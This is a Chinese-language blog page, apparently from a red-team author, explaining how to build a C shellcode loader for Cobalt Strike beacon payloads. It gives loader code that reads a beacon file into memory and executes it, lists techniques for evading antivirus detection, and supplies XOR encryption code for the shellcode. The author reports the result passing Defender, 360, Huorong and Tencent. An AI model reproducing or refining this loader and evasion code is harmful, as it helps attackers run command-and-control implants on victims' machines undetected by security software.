<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>如何用C语言实现自己的Shellcode Loader | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="0x01 前言之前github找了一个基于go的loader，生成后文件大小6M多，而且细节不够了解，一旦被杀，都不知道改哪里，想来还是要自己写一个loader">
<meta property="og:type" content="article">
<meta property="og:title" content="如何用C语言实现自己的Shellcode Loader">
<meta property="og:url" content="http://example.com/2022/11/01/%E5%A6%82%E4%BD%95%E7%94%A8C%E8%AF%AD%E8%A8%80%E5%AE%9E%E7%8E%B0%E8%87%AA%E5%B7%B1%E7%9A%84Shellcode-Loader/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="0x01 前言之前github找了一个基于go的loader，生成后文件大小6M多，而且细节不够了解，一旦被杀，都不知道改哪里，想来还是要自己写一个loader">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2022/11/01/%E5%A6%82%E4%BD%95%E7%94%A8C%E8%AF%AD%E8%A8%80%E5%AE%9E%E7%8E%B0%E8%87%AA%E5%B7%B1%E7%9A%84Shellcode-Loader/image-20221101150620575.png">
<meta property="og:image" content="http://example.com/2022/11/01/%E5%A6%82%E4%BD%95%E7%94%A8C%E8%AF%AD%E8%A8%80%E5%AE%9E%E7%8E%B0%E8%87%AA%E5%B7%B1%E7%9A%84Shellcode-Loader/image-20221031112509768.png">
<meta property="og:image" content="http://example.com/2022/11/01/%E5%A6%82%E4%BD%95%E7%94%A8C%E8%AF%AD%E8%A8%80%E5%AE%9E%E7%8E%B0%E8%87%AA%E5%B7%B1%E7%9A%84Shellcode-Loader/image-20221031113841499.png">
<meta property="og:image" content="http://example.com/2022/11/01/%E5%A6%82%E4%BD%95%E7%94%A8C%E8%AF%AD%E8%A8%80%E5%AE%9E%E7%8E%B0%E8%87%AA%E5%B7%B1%E7%9A%84Shellcode-Loader/image-20221031113643847.png">
<meta property="article:published_time" content="2022-11-01T12:30:44.000Z">
<meta property="article:modified_time" content="2022-11-01T12:57:49.745Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="免杀对抗">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2022/11/01/%E5%A6%82%E4%BD%95%E7%94%A8C%E8%AF%AD%E8%A8%80%E5%AE%9E%E7%8E%B0%E8%87%AA%E5%B7%B1%E7%9A%84Shellcode-Loader/image-20221101150620575.png">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
<meta name="generator" content="Hexo 6.0.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-如何用C语言实现自己的Shellcode-Loader" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2022/11/01/%E5%A6%82%E4%BD%95%E7%94%A8C%E8%AF%AD%E8%A8%80%E5%AE%9E%E7%8E%B0%E8%87%AA%E5%B7%B1%E7%9A%84Shellcode-Loader/" class="article-date">
  <time class="dt-published" datetime="2022-11-01T12:30:44.000Z" itemprop="datePublished">2022-11-01</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      如何用C语言实现自己的Shellcode Loader
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h1 id="0x01-前言"><a href="#0x01-前言" class="headerlink" title="0x01 前言"></a>0x01 前言</h1><p>之前github找了一个基于go的loader，生成后文件大小6M多，而且细节不够了解，一旦被杀，都不知道改哪里，想来还是要自己写一个loader</p>
<span id="more"></span>

<h1 id="0x02-免杀效果"><a href="#0x02-免杀效果" class="headerlink" title="0x02 免杀效果"></a>0x02 免杀效果</h1><p>文件大小12KB</p>
<p><img src="/2022/11/01/%E5%A6%82%E4%BD%95%E7%94%A8C%E8%AF%AD%E8%A8%80%E5%AE%9E%E7%8E%B0%E8%87%AA%E5%B7%B1%E7%9A%84Shellcode-Loader/image-20221101150620575.png" alt="image-20221101150620575"></p>
<p>虚拟机Win10：Defender（测试时间2022/10/31）</p>
<p><img src="/2022/11/01/%E5%A6%82%E4%BD%95%E7%94%A8C%E8%AF%AD%E8%A8%80%E5%AE%9E%E7%8E%B0%E8%87%AA%E5%B7%B1%E7%9A%84Shellcode-Loader/image-20221031112509768.png" alt="image-20221031112509768"></p>
<p>物理机Win10：360安全卫士（开核晶）、360杀毒、火绒、腾讯管家（测试时间2022/10/31）</p>
<p><img src="/2022/11/01/%E5%A6%82%E4%BD%95%E7%94%A8C%E8%AF%AD%E8%A8%80%E5%AE%9E%E7%8E%B0%E8%87%AA%E5%B7%B1%E7%9A%84Shellcode-Loader/image-20221031113841499.png" alt="image-20221031113841499"></p>
<p><img src="/2022/11/01/%E5%A6%82%E4%BD%95%E7%94%A8C%E8%AF%AD%E8%A8%80%E5%AE%9E%E7%8E%B0%E8%87%AA%E5%B7%B1%E7%9A%84Shellcode-Loader/image-20221031113643847.png" alt="image-20221031113643847"></p>
<h1 id="0x02-Loader前世"><a href="#0x02-Loader前世" class="headerlink" title="0x02 Loader前世"></a>0x02 Loader前世</h1><p>编写shellcode loader，网上的文章很多了，但或多或少都会有点问题，比如这篇文章：<a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/oVGWlkv9amgGS5abzNEpdg%EF%BC%8C%E4%BB%96%E7%94%A8%E7%9A%84shellcode%E6%98%AFmsf%E7%94%9F%E6%88%90%E7%9A%84%EF%BC%8C%E5%BD%93%E4%BD%A0%E6%8D%A2%E6%88%90cs%E7%9A%84shellcode%E6%97%B6%EF%BC%8C%E4%BD%A0%E4%BC%9A%E5%8F%91%E7%8E%B0%EF%BC%8Cvs%E7%BC%96%E8%AF%91%E5%99%A8%E6%8A%A5%E9%94%99%E2%80%9C%E7%BC%96%E8%AF%91%E5%99%A8%E9%94%99%E8%AF%AF">https://mp.weixin.qq.com/s/oVGWlkv9amgGS5abzNEpdg，他用的shellcode是msf生成的，当你换成cs的shellcode时，你会发现，vs编译器报错“编译器错误</a> C2026”</p>
<p>参考：<a target="_blank" rel="noopener" href="https://learn.microsoft.com/zh-cn/cpp/error-messages/compiler-errors-1/compiler-error-c2026?view=msvc-170">https://learn.microsoft.com/zh-cn/cpp/error-messages/compiler-errors-1/compiler-error-c2026?view=msvc-170</a></p>
<p>这个错误简单说，就是vs编译器规定，单个变量的字符串长度不能超过16380 个字节，而cs导出的stageless、x64的shellcode多达263168字节，大于16380字节，所以会报错，直接用网上文章的代码不行，我们就要学习下细节了</p>
<h1 id="0x03-Loader今生"><a href="#0x03-Loader今生" class="headerlink" title="0x03 Loader今生"></a>0x03 Loader今生</h1><p>一个最简单的shellcode loader</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">int main()&#123;</span><br><span class="line">    unsigned char buf[] = &quot;shellcode&quot;;</span><br><span class="line">    void* exec = VirtualAlloc(0, sizeof buf, MEM_COMMIT, PAGE_EXECUTE_READWRITE);</span><br><span class="line">    memcpy(exec, buf, sizeof buf);</span><br><span class="line">    ((void(*)())exec)();</span><br><span class="line">    return 0;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>shellcode存放于变量 -&gt; 内存申请 -&gt; 内存拷贝 -&gt; 内存执行</p>
<p>由于cs导出的stageless、x64的shellcode多达263168字节，不能存到变量，所以我们选择从文件中读取，可使用文件打开函数fopen</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">FILE *fp = fopen(&quot;beacon-stageless-x64.bin&quot;, &quot;rb&quot;)</span><br></pre></td></tr></table></figure>

<p>申请内存空间，可使用函数malloc、new、VirtualAlloc、HeapAlloc、GlobalAlloc、LocalAlloc、CoTaskMemAlloc</p>
<p>参考：<a target="_blank" rel="noopener" href="https://learn.microsoft.com/zh-cn/windows/win32/memory/comparing-memory-allocation-methods">https://learn.microsoft.com/zh-cn/windows/win32/memory/comparing-memory-allocation-methods</a></p>
<p>其中new是c++中用来申请内存的，VirtualAlloc用的较多，被杀软拦截的可能性较大，后面几个不是很常用，此处我们选择malloc</p>
<p>需要注意，malloc是c语言标准库，意味着可跨平台，VirtualAlloc是windows api，算是windows平台下c语言运行时库，要想写跨平台的loader，需要用c语言标准库</p>
<p>参数为shellcode大小，并将其返回值类型强制转换为char *</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">char *p = (char *) malloc(sizeof(buf));</span><br></pre></td></tr></table></figure>

<p>拷贝shellcode到内存空间，可使用函数memcpy、fread、strcpy，此处我们选择fread</p>
<p>第1个参数p为内存地址，通常为数组或指针，第2个参数表示每个数据块的字节数，第3个参数表示要读取的数据块的块数，第4个参数表示文件指针</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">fread(p, sizeof(buf), 1, fp); </span><br></pre></td></tr></table></figure>

<p>调用申请的内存空间首地址加载shellcode</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">((char(*)())p)();</span><br></pre></td></tr></table></figure>

<p>最后这行代码看着有点复杂，但其实不难，我们看下面这个例子</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">void hello() &#123;</span><br><span class="line">      printf(&quot;hello world&quot;);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">int main() &#123;</span><br><span class="line">    hello();  // 简化调用</span><br><span class="line">    (*hello)();  // 标准调用</span><br><span class="line">    return 0;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">hello()的标准调用方式是(*hello)()，也就是取这个函数的地址再调用，那么同理，void (*hello)()也可以理解为标准声明方式</span><br><span class="line">对于void (*hello)()这种函数声明，它的类型为void(*)()，也就是说，如果想要将某个函数强制转换为此类型应为(void(*)()) hello()</span><br><span class="line">回到( (char(*)()) p)()也就是将p强制转换为类型char(*)()后，再作为函数调用</span><br></pre></td></tr></table></figure>

<p>上面只是讲了shellcode loader的基本步骤，实际编写的时候出于免杀效果好的考虑，可做如下操作：</p>
<p>01、可在申请内存空间的时候去掉可执行属性，后面再对申请的内存空间设置可执行属性</p>
<p>02、添加一些干扰代码，如调用memset对申请的内存空间全部置0</p>
<p>03、改用其他函数实现对应功能</p>
<p>04、还可以通过动态调用函数实现对应功能，可参考这篇文章：<a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s?__biz=MzI0NzEwOTM0MA==&amp;mid=2652477998&amp;idx=1&amp;sn=21dd0456161ef1f38835b05e8da531e8&amp;chksm=f258399dc52fb08beb906630b4591b12c0db7058ddadce894e9f78626e2bae45c5690a3150ee&amp;scene=178&amp;cur_album_id=1430891819562549250#rd">https://mp.weixin.qq.com/s?__biz=MzI0NzEwOTM0MA==&amp;mid=2652477998&amp;idx=1&amp;sn=21dd0456161ef1f38835b05e8da531e8&amp;chksm=f258399dc52fb08beb906630b4591b12c0db7058ddadce894e9f78626e2bae45c5690a3150ee&amp;scene=178&amp;cur_album_id=1430891819562549250#rd</a></p>
<h1 id="0x04-Shellcode加密"><a href="#0x04-Shellcode加密" class="headerlink" title="0x04 Shellcode加密"></a>0x04 Shellcode加密</h1><p>上面是loader的讲解，shellcode其实也需要加密，不然会被杀软直接杀掉</p>
<p>shellcode加密相对好做，我这边测试，简单的异或加密，即可过掉大部分杀软，下面贴一下加密功能的代码，代码讲解基本和上述一样</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">int getFileSize(char* path) &#123;</span><br><span class="line">    FILE* fp = fopen(path, &quot;rt&quot;);</span><br><span class="line">    if (fp == NULL) &#123;</span><br><span class="line">        return -1;</span><br><span class="line">    &#125;</span><br><span class="line">    else &#123;</span><br><span class="line">        fseek(fp, 0, SEEK_END);</span><br><span class="line">        int length = ftell(fp);</span><br><span class="line">        return length;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">void Encrypt(char* oldpath, char* newpath) &#123;</span><br><span class="line">    FILE *fpr, *fpw;</span><br><span class="line">    fpr = fopen(oldpath, &quot;rb&quot;);</span><br><span class="line">    fpw = fopen(newpath, &quot;wb&quot;);</span><br><span class="line">    if (fpr == NULL || fpw == NULL) &#123;</span><br><span class="line">        return -1;</span><br><span class="line">    &#125;</span><br><span class="line">    else &#123;</span><br><span class="line">        int length = getFileSize(oldpath);</span><br><span class="line">        char* p = (char*) malloc(length * sizeof(char));</span><br><span class="line">        fread(p, sizeof(char), length, fpr);</span><br><span class="line">        for (int i = 0; i &lt; length; i++) &#123;</span><br><span class="line">            p[i] ^= &#x27;A&#x27;;</span><br><span class="line">        &#125;</span><br><span class="line">        fwrite(p, sizeof(char), length, fpw);</span><br><span class="line">        fclose(fpr);</span><br><span class="line">        fclose(fpw);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>解密的时候，同样进行一下异或即可</p>
<p>其实还有很多其他的变形异或加密方式，可参考这篇文章：<a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s?__biz=MzI0NzEwOTM0MA==&amp;mid=2652477986&amp;idx=1&amp;sn=e1d5f269d5e9799aee007ee04df10b50&amp;chksm=f2583991c52fb0871508211416ff1a129206082f0bfdb72692ba33ad7fc9fb206e2445649b80&amp;scene=178&amp;cur_album_id=1430891819562549250#rd">https://mp.weixin.qq.com/s?__biz=MzI0NzEwOTM0MA==&amp;mid=2652477986&amp;idx=1&amp;sn=e1d5f269d5e9799aee007ee04df10b50&amp;chksm=f2583991c52fb0871508211416ff1a129206082f0bfdb72692ba33ad7fc9fb206e2445649b80&amp;scene=178&amp;cur_album_id=1430891819562549250#rd</a></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2022/11/01/%E5%A6%82%E4%BD%95%E7%94%A8C%E8%AF%AD%E8%A8%80%E5%AE%9E%E7%8E%B0%E8%87%AA%E5%B7%B1%E7%9A%84Shellcode-Loader/" data-id="cl9y7u426000kizfy4mk59t9p" data-title="如何用C语言实现自己的Shellcode Loader" class="article-share-link">Share</a>
      
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E5%85%8D%E6%9D%80%E5%AF%B9%E6%8A%97/" rel="tag">免杀对抗</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2022/11/12/%E5%BC%80%E6%BA%90%E7%9A%84beacon%E4%BA%8C%E5%BC%80%E9%A1%B9%E7%9B%AEgeacon-pro/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          开源的beacon二开项目geacon_pro
        
      </div>
    </a>
  
  
    <a href="/2022/11/01/CobaltStrike%E6%9C%8D%E5%8A%A1%E7%AB%AF%E9%85%8D%E7%BD%AE%E5%8F%8A%E4%B8%8A%E7%BA%BF%E5%BE%AE%E4%BF%A1%E6%8F%90%E9%86%92/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">CobaltStrike服务端配置及上线微信提醒</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/Web%E6%89%93%E7%82%B9/" rel="tag">Web打点</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" rel="tag">代码审计</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%85%8D%E6%9D%80%E5%AF%B9%E6%8A%97/" rel="tag">免杀对抗</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%82%B9%E6%BB%B4%E7%94%9F%E6%B4%BB/" rel="tag">点滴生活</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%BA%A2%E9%98%9F%E7%8E%AF%E5%A2%83/" rel="tag">红队环境</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/Web%E6%89%93%E7%82%B9/" style="font-size: 10px;">Web打点</a> <a href="/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" style="font-size: 20px;">代码审计</a> <a href="/tags/%E5%85%8D%E6%9D%80%E5%AF%B9%E6%8A%97/" style="font-size: 16.67px;">免杀对抗</a> <a href="/tags/%E7%82%B9%E6%BB%B4%E7%94%9F%E6%B4%BB/" style="font-size: 10px;">点滴生活</a> <a href="/tags/%E7%BA%A2%E9%98%9F%E7%8E%AF%E5%A2%83/" style="font-size: 13.33px;">红队环境</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/11/">November 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/10/">October 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/07/">July 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/04/">April 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/03/">March 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/02/">February 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/01/">January 2022</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2022/11/12/%E5%9F%BA%E4%BA%8ENim%E8%AF%AD%E8%A8%80%E7%9A%84%E5%85%8D%E6%9D%80%E6%89%93%E5%8C%85%E5%99%A8/">基于Nim语言的免杀打包器</a>
          </li>
        
          <li>
            <a href="/2022/11/12/%E5%BC%80%E6%BA%90%E7%9A%84beacon%E4%BA%8C%E5%BC%80%E9%A1%B9%E7%9B%AEgeacon-pro/">开源的beacon二开项目geacon_pro</a>
          </li>
        
          <li>
            <a href="/2022/11/01/%E5%A6%82%E4%BD%95%E7%94%A8C%E8%AF%AD%E8%A8%80%E5%AE%9E%E7%8E%B0%E8%87%AA%E5%B7%B1%E7%9A%84Shellcode-Loader/">如何用C语言实现自己的Shellcode Loader</a>
          </li>
        
          <li>
            <a href="/2022/11/01/CobaltStrike%E6%9C%8D%E5%8A%A1%E7%AB%AF%E9%85%8D%E7%BD%AE%E5%8F%8A%E4%B8%8A%E7%BA%BF%E5%BE%AE%E4%BF%A1%E6%8F%90%E9%86%92/">CobaltStrike服务端配置及上线微信提醒</a>
          </li>
        
          <li>
            <a href="/2022/10/24/ThinkPHP%E6%9C%80%E6%96%B0%E7%89%886-0-13-0day%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90/">ThinkPHP最新版6.0.13 0day利用链分析</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2022 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.4.1.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>